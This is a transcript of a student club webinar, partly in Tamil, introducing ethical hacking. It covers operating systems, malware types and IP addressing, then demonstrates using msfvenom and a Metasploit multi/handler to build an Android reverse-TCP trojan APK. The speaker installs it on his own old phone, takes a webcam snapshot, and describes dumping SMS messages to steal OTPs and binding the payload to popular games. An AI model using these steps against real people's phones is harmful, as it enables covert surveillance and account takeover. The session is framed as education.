Hi guys, and this is Sandhya from FOSS CIT. நான் தான் இந்த
Hi
கிளப்போட
guys,
செக்ரட்டரி அண்ட்
and
இன்னைக்கு
this
வந்த
from
எல்லாத்துக்கும் தேங்க்ஸ் அண்ட் சண்டே ஈவினிங் எல்லாரும் டைம் ஸ்பெண்ட் பண்ணி வந்திருக்கீங்க. ஹோப் யூ கைஸ் வந்து ஒரு நல்ல ஒரு குட் திங் லேர்ன் பண்ணுவீங்கன்னு வி ஆர் வெயிட்டிங். அண்ட் இன்னைக்கு வந்து ஃபாஸ்ட் ஐடி வந்து உங்களுக்கு வந்து ஹேக்கிங் அப்படிங்கிறது வந்து எல்லாத்துக்குமே அது ஒரு மித் மாதிரி தான் இருக்கும். எங்க ஸ்டார்ட் பண்ணணும், எங்க முடிக்கணும், ஹேக்கிங்கிறது ஒரு மேஜிக் மாதிரி நம்ம எல்லாம் ஃபீல் பண்ணிட்டு இருப்போம். பட் இட்ஸ் நாட் லைக் தட். இட்ஸ் ஜஸ்ட் பீஸ் ஆஃப் கோடிங் அப்படிங்கிறது தான் வந்து ரியாலிட்டி. ஸோ தட் வந்து இங்க வந்து ஹேக்கிங் அதை பத்தி இருக்கிற அந்த நம்மளோட அந்த மித்தையும் எல்லாத்தையும் டீமிஸ்டிஃபை பண்றதுக்கு என்னோட கோ செக்ரட்டரி ஆஃப் ஃபாஸ் மிஸ்டர் ரோஹித் வந்து இப்போ நம்மளுக்கு வந்து ஹேக்கிங் பத்தி ஒரு ஃபுல் இன்ட்ரோ கொடுப்பாரு. ஸோ தட் நீங்க இங்க இருந்து யூ கேன் ஸ்டார்ட் யுவர் கரியர். ஓகேவா? ஸோ அதனால வந்து hope you guys will enjoy and learn a lot in this session. And I welcome Rohit to start.
Hi guys, good evening. Welcome to the online webinar on Intro to Hacking, organized by FOSS CIT, Coimbatore Institute of Technology. So myself Rohith, I'm going to handle the session in this delightful evening. So before going through the topic hacking, I'm gonna say it's strictly for education purpose only. So I'm going to take this session to spread the knowledge of ethical hacking and to create an awareness on malicious app to the younger generation. So yes, let's grab the fundamentals of hacking. So let's start the session. So hacking versus ethical hacking. So many people confuse hacking and ethical hacking. Here, first we define hacking and ethical hacking. Hacking refers to activities with ill intention, which compromise digital devices like computers, phones, networks, etc. But ethical hacking is different from hacking. Ethical hacking is for good purpose. It is done by security researchers and people working on a software firm. So what they do is they will locate the weakness and vulnerabilities of computer and information system. So they can patch the vulnerability. So the hacker from the outside cannot compromise the computer or the information system. So this is called hacking and ethical hacking. So here we see weakness and vulnerabilities. So I give a real-time example. So we assume we are playing cricket. So we all watch cricket. So a batsman can have a weakness on facing spin bowlers. So ஒரு பேட்ஸ்மேனுக்கு ஸ்பின் ஆட கஷ்டமா இருக்கலாம். So he's facing difficulties on spin bowlers. So likewise, a software or a script can have a weakness, something uh, that can compromise and make a hacker to attack the system. So in cricket, what we do? So if I was a bowler, I will bowl. If I was a captain in my team, I will give the over to spin bowler. Why? Since the batsman's weakness is spin. So if I give the over to spin bowler, the probability of getting wicket is high. Likewise, if the hacker found a weakness or the vulnerability in the system, he can easily attack the system and compromise and take the data and compromise the system. So like this, we are going to hack your friend's phone. But before going to see that, let's talk about something about hacking. So hacking is a very vast topic. It is like our galaxy, and hacking a friend's phone is like a planet in the solar system. So galaxy has millions of solar system, and a solar system has n number of planets. So hacking a phone is a minute part in hacking. So hacking a phone is not only hacking. Hacking has a large number and variety types of hacking. Hacking a phone, it's also called as mobile hacking. It's just a part, a very minute part. So if you are thinking that ethical hacking is my career, so then I will say you are choose a wise choice. So many software developers will study CSC or M.Sc, B.Tech, IT, etc. They will get a job or intern and they will go as a software developer. They don't uh, they don't care about security or networking field. So if you think I will achieve more, I have an interest in networking or security field, yes, you made a wise choice. But so hacking needs some qualities. So qualities like long-term learning. So if you take uh, ethical hacking or computer networking as a career, you must learn till your life, end of your life. So why I am saying like this is in past we can take before 10 years there is no there is nothing called Google Meet, Zoom, etc. So now there is Zoom. So whenever a new software or a app is developed, the weakness also will develop. We are talking about weakness and vulnerability. What is that weakness or vulnerability? It's just a minute code which makes the whole software weak. So, who is responsible for the weakness? The software developer is the only and foremost person who is responsible for the weakness. If the code is right, there will be no weakness. But writing a code with 0% errorless and without weakness is practically not approachable. So, whenever you create a software or write a program, there will be something weakness or vulnerability. So the hacker can find it and exploit it and compromise your system. So I said about qualities, long-term learning, and we need patience. So patience, when I say the word patience, in this generation, younger generations, there is no patience, I thinking. So I also have very less patience. But after I choose my career as networking and security, so I practice to become more patient since we need to study more to become a very good ethical hacker or a cyber forensic investigator. Last but not least, practice. So we need to practice more and more to become perfect. Like the quote says, practice makes a man perfect. So you may think, so I have choose my career as hacking. So what, how, where to study ethical hacking? So for this, at the end of the session, we will share website, books, courses, etc., which will help you to go step by step in hacking. So operating systems. So why operating systems? So for hacking, we need to work on some tools. So normally we use Windows systems, Windows 8 or Windows 10, but Windows has hacking tools, but not in a very larger amount. So we go with Linux. Normally people hate Linux since it is mostly of command line. So in our childhood life, from school to college, we use Windows, which is GUI, graphical user. So we always use GUI, but Linux is mostly command line. It has GUI, but we most use command line. So many people hate because of using command line. It's just a black and white screen, black screen with white text. So many people hate this, but when someone uses it, they love very much. So try to use command line. So Windows has a command line called command prompt. So try to use that. It may help you in if you use that, you can use Linux terminal very easily. So there are many operating systems like Windows, Mac, Linux. Windows has versions like XP, 7, 8, 10, etc. And Linux has Ubuntu, Red Hat, Kali, Fedora. So for hacking, we have many OS. So what to choose? So the first and foremost is in hacking is to choose OS. So how to choose? So you want to become a offensive security or want to do pen test. Testing is like testing a software or a computer to find a weakness or vulnerability. So for that, you can go with Kali Linux or Black Arch Linux. So you want to hack or want to pen test wireless devices like routers, switches, your home modems. For that, we can use Parrot. So Parrot is a bird. It will fly. So the name says it says wireless, and SIFT is a Linux-based OS. It is especially for forensics. You may forensics is likewise if data breach or a security issue has occurred. After that, forensic team will analyze the system which has been attacked, who attacked it, when the attack has occurred. This is cyber forensics. This is a very interesting in hacking. So SAFT's OS is used for forensics. So these are the OS used for hacking. I named only 4, but there are many OSs. So next, so I said we need to practice more and more. So I had chose my career as ethical hacking and started working with Kali Linux. So what to do? I need to hack someone, or I need to hack my friend's phone or laptop. So I search in Google how to hack my friend's phone. So I go through some links. So I have a code. I copied from a website and ran in my Kali Linux. Then boom, what happened? My OS will be crashed. For some reasons or any incompatible code, sometimes the OS will be crashed. So what happens? You need to reinstall again the OS. Also, if you have another OS which is parallelly running with Kali Linux, that is dual boot. So you have a laptop which has Windows plus Kali Linux. If one OS is crashed, then other will also will not be usable. So you suffer from a data loss, which can be unrecoverable. So to overcome this, we go for virtualization. What a virtualization is, you can run many operating systems in one hardware. So a laptop can run more than one OS at a time. So this diagram shows that. So this is in left hand side. We can see in our whole hardware one OS is running. Mostly we do this, but in right side virtualization is what? Yeah, full hardware is used by many number of OS. They are the full hardware is shared by n number of OS. So if one OS crashed, the other two OS will not suffer from the data loss. So the so virtualization comes to rescue in hacking. So there are many virtualization softwares to create virtual OS. So mainly we see VirtualBox and VMware. So they are two virtualization softwares most used. So VirtualBox is a light one, easy to use and beginner friendly. So if you don't know how to install OSs, so it will be a beginner friendly and it is free. So on seeing VMware, it is not free, and then it is a heavy and it has more complicated functions. So this is one of the disadvantage of VirtualBox. Since VMware has more functions, we can take snapshots, etc. So next, so yes, let's go. It's time to hack your friend's phone. But as I said, the main intention of this webinar is to gain knowledge and not to hack your friend's phone. So we are going to see some basic terms and their usage. Why I am going to say some basic terms? I am. You think that he's wasting our time? He said that he will hack his friend phone and do, but he are wasting the time in saying some basic terminologies and stuffs. But in interviews, if you go to a job, if you go for any certifications, yes, this basic terminologies will be asked. No one will. If you go and say I have hacked my phone, then no one will literally take you for the job. So I am here to give some basic and fundamental terms used in hacking, not only in hacking, in security point of view. So malwares. So malwares is a collective noun. So there are many types of malwares. So malware is a software or any script which can cause damage to the computer or a server or a client. So we commonly called as virus, but it's not a virus. It's a malware. So there are many types: worms, Trojan horses, ransomware, spyware, adware. Worm is a certain type of malware which replicates and which slows down the computer. Trojan horse is the one we going to use now for hacking our phone. So it acts like a not only which acts like a original app with non ill which acts like a normal app but does malicious activities. Ransomware, as the name says, ransom. If the system is attacked by ransomware, it takes some private data of us and asks some money. And if we not give the money, it will delete the data. This ransomware. Spyware, it's used to spy someone. And adware, we many seen websites, and it will show ads, etc. These are the malwares. So we are going to use one of the malware to attack an phone. So another fundamental thing. So when you go with networking or security, the most fundamental thing is IP, Internet Protocol address, IP address. So there are two address for each computer, each phone, each modem you have, etc. And each of them has a address called MAC address. So what is a public private address, IP address and a MAC address? So first we go with MAC address. So before first we see that MAC is a unique address. So if your phone has a MAC address, my phone will not have a same MAC address. So this is unique. And MAC address is also called as hardware address. So it, as I said before, it's unique and it will not get changed. We can change the MAC address by doing something in related to hacking called MAC spoofing. The terminology is called MAC spoofing. It's used to change the MAC address to someone's MAC. So public IP, private IP. So before going to this, we can go with another scenario. So we have many friends in our college. So I take one of my college friend whose name is Rakesh. So as humans, we have unique face. So if my face and Rakesh face will not be same, so the face will be unique. Also, Rakesh will have a roll number in his school and in his college. So Rakesh has a roll number of Rakesh in school is 50. We can assume his roll number is 50, but in college he has 38. So he has different roll numbers, one in college and one in school. So by coming from here, so Rakesh face will be act as a MAC address. So it is unique. So whenever a person sees Rakesh face, they will identify as Rakesh. Likewise, Rakesh has 2 roll numbers, 50 in school and 38 in college. So it is called as IP. So here I mentioned that it's changes to time. So when outside you call Rakesh as 50, some will know. I will know that his roll number is 38, so I call him 38. So my friends will know his roll number is 38. But in when you go with outside world, he will be only known with his name and his face. So this is public IP, private IP. So public IP is known only to WAN. Private IP is LAN. LAN is called local area network. The name local private. So local area. So to identify a PC in a local area, we identify it by private IP. In a wider area network, that is called internet. Outside our home. Inside our home is called LAN. Outside our home is called WAN. So it is outside our home, it is called WAN, and we can identify it by public IP. So here, as I said, inside our home it's LAN, and outside it's WAN. So inside our LAN we have a private IP. Outside our WAN we have a public IP. So why I'm saying this is, I will use private IP for today's demonstration. So I will not use a public IP. Why I'm saying this is, if I will demonstrate with the public IP, the watches may do it the same. So I am doing for education purpose and for a fun purpose, but something like stealing a photo from a friend's phone or stealing a girlfriend's number, like that, doing is malicious. And if we complaints in a police or cyber department, so you will get arrested and we go to the prison. So for that we using a private IP. So LAN is also so what is LAN means, in your home you can use a mobile hotspot or a modem. So the devices or the computers which connected to a modem or a mobile hotspot is called LAN, and normally connected to internet is called WAN. So I'm going to demonstrate on LAN. So what I'm coming to say is, the devices which connected to my hotspot only I can hack. So I turn my entire my laptop, my phone is connected with my phone's hotspot. So if my if my friend is also in my home and connected with my same mobile hotspot, then only I can hack my phone. For this demonstration, I done like this. But but we can also do, if your friend is in Chennai and you are in Coimbatore, so you can also hack using their public IP. That is WAN's identifier. But I'm not going to do it. As I said before, it is just for fun purpose, education purpose only. So I'm going to demonstrate in LAN and private IP. So we are so we are going to hack mobile. So I'm going to create an APK. So before going to that, mobile has two different OSs, Android and Mac. But most of the phones are Android. So I have another Android phone. So I go with Android. But the process to create a app is similar for uh, Mac and Android, Apple OS and iOS and Android. So before that, I'm going to hack my friend's phone using an app. So I will create an app. Once again, so I will create an app, Android app, and install it in my friend's phone. So what we can say, if my friend denies it, so I don't like your app, so I will not install it. If he says like that, So we can go with another usage. It's called a backdoor. What a backdoor is we create a malicious app in back of a original app. For example, if you have a game like Minimality or PUBG, we will download Minimality or PUBG's original app, and we create a malicious app. We will bind each other. So whenever the original app Minimality or PUBG opens, my malicious code also opens and runs. But the end user, that is you yourself and myself, don't know that malicious activity is running. So it's also called as mode apps. So the apps we know use for seeing Netflix at free cost and playing games with unlimited resources are same like this. This type of apps are harmful. They can steal users data like photos, contacts, etc. So yes, so now I do it in LAN with my old phone. So let's do it. So hacking. So as I said, I will create a app and install it my friend's phone. So to create an app, in hacking terminologies, we call it as a payload. Yeah, payload is a malicious software. So we are going to create a payload. 1 second. Before going to that, we have something called Metasploit. Metasploit is a framework which has many tools inside it. So it can create a payload, it can create an exploit, it can create encoders, post exploitation tools are available, and evasion. What is a payload is? A payload is a software and an app which is more similar to a Trojan horse, which will do which அது என்ன பண்ணும்னா which what it does is it will create a tunnel from hackers and the friend's phone. So it will create a tunnel to a friend's phone and your laptop. So if you need something from your friend's phone, it will take and supply it to the tunnel, and your laptop receives it. So exploit is, so we see weakness and vulnerabilities. So to attack that, we need exploits. That is called exploit. So a weakness. So the before scenario I said the batsman has a weakness of spin bowling. So what the exploit is here? I will give a legendary spin bowler. I give the over to a legendary spin bowler, so he will take the wicket. Likewise, we have n number of exploit for n number of weakness. So encoders is encoding, and post exploitation is I have exploited a, that is I have attacked a phone, and post means after it. After attacking it, what can I do? That is called post exploitation. Evasion, antivirus. So most of the virus is identified by antivirus. To evade that, we have evasion tools inside Metasploit. And MSF Venom, we are going to use MSF Venom. MSF Venom is a tool to create Metasploit payloads. So Metasploit has payloads. Going to Metasploit and creating payload is a time-consuming task. So they created a command line called MSF Venom, a command line tool called MSF Venom. So it has only one purpose, to create a Metasploit payload. So we are going to use this. So you are seeing a two-line code. It's not like a code; it's a two-line command. So this two-line command is just enough to hack a friend's phone. So this is not the myth. So this is what exactly hacking, but it's not possible. But I will say what is this. So as I said before, it's just a Linux command. MSF venom -p is called a payload. So what payload I'm going to use is a Android payload. So I'm using Android mobile. So I'm using Android meterpreter. Meterpreter is a listener. So I have attacked the phone. The phone will send some data to my computer now. So to receive that, I need a listener. The listener is called meterpreter, reverse TCP. So we need to create a tunnel. So there should be some data to be received from reverse direction. So we are using reverse, and TCP is a internet protocol which will be you study in networking uh, papers. So Yellowhost is called hackers IP. So localhost IP. So I gave my computers private IP. This is a private IP. So I gave my private IP, and endport is a port, which is a logical port. We have many. There are two ports. There are two types of ports: physical and logical ports. Physical is your USB port, your Ethernet port, your earphone port, etc. in laptops and computers. Logical port is what we cannot see. There are around 65,000 logical ports. We are using a port number called 4444 and output file. So Android apps have an extension called .apk. So I'm saving as game.apk. So this two-line command will create a payload which does malicious activities. What type of malicious activities will be shown here. So yes, once again, I will give a demo of what we do to hack the. So I said it is a just a online command. So I'm ready to. I'm typing the command msf venom -p Android. So why I gave this IP address 182.168? So I need to see my private IP in my this is calling nets. I forgot to say this. So I opened a terminal and started to type the MS Venom without saying what this is calling next and all. So to see my private IP, I will give ifconfig. So it acts a password. So I'm giving my password. So this will show your private IP. See here, I will have my private IP as 192.168.43.48. So I copy this and paste here. So as I said before, I'm going to use LAN and private IP. So I pasted my private IP and endport as 444 and output file as game2.apk. So this will take 10 or 15 seconds of time to create a payload with the name of game2.apk. So let's wait for several seconds. think I missed. One second. I think there will be no front slash. Yes, there will be no front slash in front of Android. Yes, you can see that payload size is 10,188 bytes and saved as game2 as APK. So I give ls command which lists the entire files and folders in the current directory or the current folder. So here, that's my game. Yes, here we can see game2.apk. So what I do is I give sudo. I will copy it to my Windows OS. So I am here using VirtualBox to run my Kali Linux OS. So what I do is I shift the created payload from Kali to Windows, and I will from Windows to PC I will shift the app using a data cable. So here I am in a game2.apk. I'm copying it and copying in my desktop. So you can see that these two APKs are same. This is I created in morning to check it's working or not. So in my desktop you can see that. So I will switch to my desktop. So this is my PC, and here you can see I got my game2.apk, which is what I created using MSF Venom. So this is similar to my previous APK. So what I do is I will copy this payload to my phone, my old phone, using a data cable. So I connected my old phone. So you can see my phone here. What I do is I copy it and paste it somewhere. Yes, paste it in Android folder. I can paste it in anywhere, so I pasted here in game2.apk. So I turn on my camera in my phone, and I will so Prakash, please pin my phone. I will turn on my video camera. Yes. So if my phone is visible, this is visible, Prakash. So this is my old phone. This is for a test piece. So whenever I need to practice hacking, I will use this phone. So I have copied in my Android folder. So I go there. Uh, so let's search for Android. Just a second. Yes, this is fine. on C Android. Yes, it's finally here. So this is the game to APK. This is the game 2.apk we have created. So I'm clicking it. Main activity. Next, next, next. Yes, you can see it. It's giving us app install. I'm clicking at done. So the app is successfully installed here. So what to do next? So we need to create a listener. So this phone will send the data, private data of this phone to this computer, so this laptop. So we need to create a tunnel and a listener to listen what data the phone sends. So for that, I will switch back to my laptop and create. I will type three or four commands to start listening my phone's activities. So I switch off my video and Prakash, please pin my presentation. Yes, okay. So here, if I to use Metasploit, we need to type MSF console. So it takes around 1 minute. So I have already given MSF console, and it is ready. So we need to start a listener. So for that we give four commands. First is use multi slash handler. So what is multi slash handler is you can use multiple connections. This handler will can have this listener can handle multi connections. So if you have a party at your home, there are 5 friends, and in each of them, in each phone, you have uploaded this same APK and you opened it. So you can get 5 incoming requests to this laptop. So you can get data of your 5 friends phone. So that we are giving use multi handler. So next, we need to set the payload what we use. So set payload Android. I think here slash will come here. Android slash meterpreter slash TCP. That's all. So the payload is set to Android meterpreter reverse TCP, and same the LOs, the local host what we set before 192.168. I think I forget it. 43.48. 43.48. Set port 444, and that's all. This is a 4-line command. When we give exploit, yes, it starts to listen in the port 192.168.43.48 in port number 4444. So now I switch back to my phone. I turn on my video. So Prakash, please spin my phone. Prakash. Okay. So I need to type my pin. Just a second. So here you can see that it's started. Uh, can you say it again? Okay, okay. So my phone is visible. I have so you can see the name. The app name is main activity. So in menu, I can see a main activity. This is the app I installed. So why its main activity is, so you can see here. it's given as main activity, and it's asking that it's an existing application. So this is main activity. So I keeping my phone here, and you can see this here. So if I touch main activity, you can see something with my phone. I shift here. Yes. So I have opened the main activity. So let's go back to the laptop and see what's happened. Is my laptop screen visible, Prakash? So you can see here sending stage. So the meter butter session one is open from where? From it's giving the IPS 83. So I will type help. Help will list the commands what we can do. So there are many things. I come from bottom to top. So we can have many numbers. So there's a application control command. So we can see what are the apps which my phone has installed, and we can install them, uninstall them. We can dump their contacts, then dump their SMS. So we can get SMS contacts, call logs. So we can check route, the phone is routed or not. We can get their location. We can send SMS from their phone. So we can play music. So we can take a snapshot from their phone and send it to the laptop. We can record their mic. We can turn on their camera, and we can see the live stream in our laptop. So we can get the screenshot, or this we can screenshot the phone's screen to the laptop. So these are some system commands. So what the system is like that, networking commands. These are some advanced commands. When you read something about networking or security, you can know about that. But in below we can see webcam stream like that. So first of all, I give something called. So let's check camera. So webcam snap is a command used to take a snapshot from a specified webcam. So from the 2-line command and the 4-line command in my Linux platform, my Linux terminal, and installing an app in my friend's phone, I can hack a phone. This is simple. So I give webcam snap. So again, I turn on my camera in my phone. So Prakash, please pin my phone. Okay. So what I'm doing is I give enter. So what it does is, so I yes. So the screen. So you can see my finger at the back of my this camera. So you can see that the image is taken from this phone, not from my video casting phone. So this is one. So likewise, we can create, we can do a number of things. So what next we can do? So we get information about the remote system such as OS. So I'm using an Android phone. So what the information it can give? So I type sysinfo. So yes, so yes, we can take screenshot, but I will say that okay. So sysinfo. So it is saying as localhost and OS. So what OS I'm using 4.4.4, and which is a Linux, and meter address is Dalvik Android. So what next I can do is, so uh, I'm going to conclude what I done and what and all can I done. So this 10 kb of payload, Android payload, can only be used in uh, phones which are older, like 2017 before produced phones. Like what I'm coming to say is, if a phone has a inbuilt antivirus scan, whenever an app is installed and whenever after installation a scan occurs, then this payload will be will not be installed, since the antivirus can easily predict, uh, conclude that it is a virus. So, like new phones like brands like MI, most people use MI. Also, I use MI. So, whenever we download and install app, it will scan the app after installation. So, that time this payload will be caught and this will be deleted as soon as it is detected. So to avoid that, we go with uh, FUD, FUD apps, fully undeletable apps. So the app, uh, what is new is, it will has a payload and it's also a script which will bypass the antivirus. So in my slides, I had shown that evasion scripts are in Metasploit. Likewise, we have many evasion tools. Whenever you create a malicious app, next you need to create a script or bind it to app to bypass or escape from an antivirus. So this app just works on a very older phone, like I shown before. So if our phone or your friend's phone has a uh, as a new phone or a antivirus after installation, so it will confidently 100% it will be got and it will be deleted. So to overcome that, we go for evasion scripts and undeletable payloads. So I'm using from LAN. So for this, I need not internet. So if you connected your friend's phone and your laptop in a home router or a modem or in a hotspot, if you turn off this and do this activity, it will be occur for 100% sure. I tried this, but in man, when you and your friend are at a remote location, different locations, you must have an internet. So this is one advantage in LAN. So this is just for educational purpose. So try with your old phones or your phone. Don't try with your family, your mom's or dad's phone, your friend's phone. So just I give you how to hack a phone. This is simple. So don't try. Hacking is a big such thing. So I can't do it. So we can, but there are many things, many difficult things in hacking. So this is just a simple thing, but we can, if we uh, learn and practice more, we can do anything in hacking. So this is what I need to say. So I again share my slides. I have only just one or two slides more. So from that, uh, yes. So I just hacked my phone. You all watched it. So if you need, you can do like this. So we can also get SMS log, send SMS, etc. So why this is malicious and likewise? So what we can say is, I have ordered something Flipkart or Amazon, or I requested a forget password in any websites like GitHub or Google. So automatically it sends a message, OTP as SMS to my phone number. If I ask a malicious app and it is installed in your friend's phone, the next second, the OTP, when you gave forgot password and you asked to send it to message, the next second you can use meter better and dump the SMS. So the last SMS contains the OTP. So you can use the OTP and make use of in very illegal manner. So don't try to do. I'm giving the things to do illegal, but don't do this. This is what I say. So, where to study hacking? So, to practice hacking, we have many websites. Most popular is TryHackMe and Hack the Box. To study hacking, we have Udemy courses and YouTube videos. Udemy has n number of courses. YouTube has n number of videos. All, but what is difficulties you face in YouTube videos is they will do all step by step, but they will skip a step, but you don't know how to do it. You will get an error, but they won't get an error. They will skip that step. So that is a disadvantage of seeing YouTube videos. Not this video, but I showed step by step with my turning on my camera off on and off. So books, I prefer books since you need you need any, so you go with any domain, networking or app development, web development, hacking, anything. You need, if you need in-depth knowledge of anything, I will always choose books. Books as books will give the highest knowledge rather than video courses, etc. So, Hacking the Art of Exploitation is a book, and Black Hat Python is a book which is used to create scripts using Python. And there are many n number of certifications. The most top hacking certifications are CEH, Certified Ethical Hacker, and CH Practical, OSCP, and CHFI. CHFI is conflict investigator. And tools. So we have n number of hacking tools which is created by students or a security researcher, and they will host it in GitHub. So you can download it from GitHub and use it in your Kali Linux. Kali Linux, why I chose this flavor is Kali has inbuilt of 200 plus tools. So we can use it to perform hacking. So um, so we will share a attendance and feedback form. Please fill it. So that's all. The session is over. So any doubts you can post it in live stream comments. So please fill the attendance and feedback form. So thank you.
And thank you, Rohit, and thank you, students, for attending. And hope you guys have bagged some good informations. And we hope that you will start hacking and start learning more in that. And if you're having any doubts now, you'll just post your doubts in comments, and we'll try to answer them.
Can I talk? So, Anuvarshini Balasubramani, can you explain once again how to get our private IP? So, hello, is this audible, Prakash? Yes. So the answer is, so in Windows, in command prompt, go to command prompt and type ipconfig, ipconfig. There you can see your private IP. In Linux, you can type ifconfig. For Linux, ifconfig, and for Windows, it's ipconfig.
Guys, any other doubts? Feel free to ask. Thank you for attending, guys, and we'll see you in the next meet. Okay, bye bye.